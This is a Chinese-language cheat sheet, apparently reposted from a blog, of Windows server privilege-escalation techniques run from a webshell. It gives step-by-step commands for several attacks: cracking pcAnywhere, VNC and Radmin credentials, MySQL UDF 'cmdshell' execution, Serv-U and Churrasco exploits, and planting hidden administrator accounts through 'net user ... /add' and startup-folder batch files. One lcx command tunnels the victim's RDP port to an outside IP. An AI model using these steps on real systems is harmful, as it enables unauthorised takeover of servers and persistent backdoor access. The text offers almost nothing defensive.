pcAnywhere提权:
1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用户的目录权限,只剩下administer和system用户目录权限,则无法提权;
2.在webshll的大马中查找到pcanywhere目录里的host目录,里面的cif文件保存了连接pcanywhere的账户和密码,然后下载下来,通过PcAnywhere密码破解工具进行破解密码,然后再自己的电脑上安装pcanywhere,然后通过连接到另一台电脑进行远程桌面连接;
——————————–
利用HASH破解提权:
1.工具:ophcrack-win32-installer-3.3.0(hash破解软件) ,Pwdump7(查看hash的软件),彩虹表(密码字典)
2.思路:渗透,管理员可能几台服务器都实用同个密码,我们获取其他一个以后可以尝试登陆
其他服务器
3.例如添加一个用户并将该用户添加到管理员组:net user backlion 123456 /add
net localgroup administrators backlion /add
4.在dos下用pwdump7运行查看该用户的hash值:backlion:1003:2FB6717FC6897581AAD3B435B51404EE:DA0492D72F8D04983188CCD4CA257E44:::
5.然后通过ophcrack和彩虹表进行破解该用户
6.防范:密码超过14位就不能破解,建议密码设置15位,越复杂越好
————————————————
MYSQL提权(udf.dll):
1.用的文件有su.php木马,Linx Mysql BackDoor.php木马
1.udf.dll的默认路径:C:\Winnt\udf.dll(win2000系统),C:\Windows\udf.dll (win2003系统)
2.找到网站目录mysql配置文件,常用的有:config.php,web.php,webconfig.php
配置文件如下:
$dbhost = ‘localhost’; // 数据库服务器 就是127.0.0.1
$dbuser = ‘root’; // 数据库用户名
$dbpw = ‘a’; // 数据库密码
$dbname = ‘dz’; // 数据库名
3.在su.php中,填入host:127.0.0.1 user:root passwor:a db:mysql,然后输入sql命令进行添加用户:select state(“net user backlion 123 /add & net localgroup administrators backlion /add”)
然后通过net user查看是否添加成功
4.在udf.ph 中host:127.0.0.1 user:root passwor:a db:mysql,然后填入DLL导出路径:C:\Windows\udf.dll ,在sql命令中输入一下命令:
create function cmdshell returns string soname ‘udf.dll’//添加一个udf.dll组件函数
select cmdshell(‘net user backlion$ 123456 /add’); //添加一个用户
select cmdshell(‘net localgroup administrators backlion$ /add’); //将用户添加到管理员组
select cmdshell(‘c:\3389.exe’); //这个是把开3389的文件放到C盘,然后运行
drop function cmdshell; //删除函数
select cmdshell(‘netstat -an’); //这是查看端口查开放情况
———————————————————————-
Churrasco提权:
1.用到的工具有:win2003 0day漏洞工具03.exe和cmd.exe;
2.然后在webshell中上传我们的03.exe和cmd.exe到可以读写的目录中,然后切换到可读写的目录中:然后在webshll路径中填入我们的cmd.exe路径如;c :/recyle/cmd.exe 下面填入:c :/recyle/03.exe “net user backlion 123 /add & net localgroup adminstrators backlion /add”
————————————————————————————–
利用sogou输入法(6.0)提权:
1.sogou输入法是6.0版本,然后我们通过webshll木马管理,查找到sogou安装的路径,然后通过上传
ImeUtil.exe 替换原来的ImeUtil.exe文件,只要一加载这个程序就会在系统中自动添加管理员
用户名:sunwear 密码:sunwear
————————————————————
lcx内网端口转化,解决在内网不能远程桌面登录:
1.webshll目标站点的wscript组件开启,并且有一个可读写的目录,一般上传到c:/recyle目录下
2.上传我们的cmd.exe和lcx.exe上去
3.然后在shll路径中填入:c:/recyle/cmd.exe 下面就输入c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1 3389
4.在本地DOS下输入: d:/lcx.exe listen 51 3333 监听51并转发到3333端口
4.在本地远程桌面里面输入:127.0.0.1:3333
———————————————
6Gftp提权:
1.默认安装目录C:\Program Files\Gene6 FTP Server
2.密码保存文件的路径是在C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini
其配置文件如下:
[Server]
IP=127.0.0.1,8021\r\n //使用的端口号
GrantAllAccessToLocalHost=0
[Acct=Administrator] //用户名
Enabled=1
Rights=0
Password=21232F297A57A5A743894A0E4A801FC3 //md5密码
3.在webshll中发现了有安装g6ftp软件,默认安装路径
4.在shll中输入:C:\recycler\lcx.exe -tran 8022 127.0.0.1 8021
6.在本地安装6gftp软件,IP地址输入:目标站点IP地址。端口号为8022,用户名为administrator,密码为破解出来的md5值;
——————————————–
Serv-U6.4提权:
1.serv-u的密钥:9dK4g4iPhvOsoEY9nprEiSsmW7OUqFaGuwHT1CtBn9K6hQVg0bd2okQ9ldel+1IGE9b4xDP0q2W+vE4vgZLA7unm6t3CxTI
2.在serv-u中下面的命令中输入:cmd /c net user backlion$ 123 /add & net localgroup administrators backlion$ /add
3.然后就添加了一个用户名
4.就可以用这个账号远程桌面登录了;
—————————————————-
VNC密码的破解和提权:
1在webshll中读取vnc注册表键值:RealVNC的注册表路径:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password
UltraVNC的注册表路径:
HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password
读取的是十进制数,需要转换成十六进制如下:
十六进制:D7 51 CC 73 31 24 7A 93
十进制: 12 7C EF FA 6E 0B 7A D9
3.破解vnc密码:vncpwdump.exe D751CC7331247A93
4.然后在本地安装一个VNC客户端,进行远程连接
—————————————————————-
Radmin提权:
1.在webshll中检查出有安装Radmin程序;
2.在读取Radmin注册表键值,然后把读取的十进制转换成16进制;
3.直接用radmi-hash工具连接,把读取的十六进制填入进去;
4.最后可以用radmin客户端连接就行了;
————————————————–
360安全卫士提权:
1.上传我们的cmd.exe和360.exe到可读写的目录下如:c:/recyle
2.在shell中输入:c:/recyle/cmd.exe 然后在下面输入:c:/recyle/360.exe sethc
3.然后远程桌面登录输入目标IP地址,过一会就弹出了一个DOS窗口,然后就可以添加用户名和密码
———————————————————————————
启动项提取:
1.在webshll中上传一个添加用户的批处理文件如:net user backlion$ 123456 /add & net localgroup adminsitrators backlion$ /add
爆出为系统修复.bat;
2.然后在wegshll中输入启动选的路径:C:\Documents and Settings\Administrator\「开始」菜单\程序\启动 上传我们的批处理文件;
3.只要管理员下次重新启动机子,就能自动添加我们的账号;
出处:http://www.cnblogs.com/milantgh/p/3601826.html
补充阅读:
2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接)
3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解)
4,SAM提权(SAM系统帐户,通常需要下载临时存放的SAM文件,然后进行HASH破解)
5,NC提权(利用NC命令,反弹一个端口,然后TELNET远程去连接一个端口,虽然权限不够大,但结合巴西烤肉,也是能够成功的)
6,PR提权(PR提权,这个就不多说了,最好是免杀的PR大杀器,这样更方面我们去操作)
7,IIS提权(IIS6.0提权,首先需要获取IIS的配置信息,利用工具进行添加后门用户)
8,43958提权(如果SER-TU有直接读入和执行的权限,那么我们就可以直接提权)
9,PERL提权(PERL提权通常是针对PERL文件夹下的提权方式,利用DIR目录%20NET USER这样来建立后门用户)
10,内网LCX提权(转发工具LCX,通常需要先本地监听一个端口,然后转发,针对内网,用本地的127连接对方的3389)
11,启动提权(如果服务器启动项有能够执行的权限,那么应该说管理员的技术肯定不精湛)
12,替换服务提权(替换某个服务EXE,比如SER-TU,可将原有的删除,再传一个同样的SER.EXE上去,等待服务器重启)
13,FXP提权(FXP这个工具其实本身他是一个传输工具,但我们可以下载他的三个文件,然后,用密码查看器的功能去获得密码)
14,输入法提权(目前来说的话,输入法提权的思路基本上不太可行了)
15,360提权(360提权,也就是我们常说的SHIFT后门,如果执行了360漏洞利用程序,连接服务器用SHIFT5下,弹出了CMDSHELL即为成功)
16,VNC提权(VNC,想必大家并不陌生,我们通常是扫描5900国外服务器时候用到VNC来连接的,同样,我们如果得到了VNC的密码,通常可以利用他来提权)
17,2003ODAY提权(如果服务器是2003的,那么就可以利用2003ODAY利用工具来进行提权了)
18,ROOT提权(如果你获得了MSSQL的密码,那么就可以导入注册表的方式,利用MSSQL语句执行我们想要的命令了)
19,SA密码服务器提权(通常去寻找SA,MSSQL的相关密码,比如CONFIG.ASP,CONN.ASP等等)
20,FTP溢出提权(这个用到LCX工具,本地溢出,转发一个端口,虽然不是内网,利用默认的21进行提升权限)
593
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
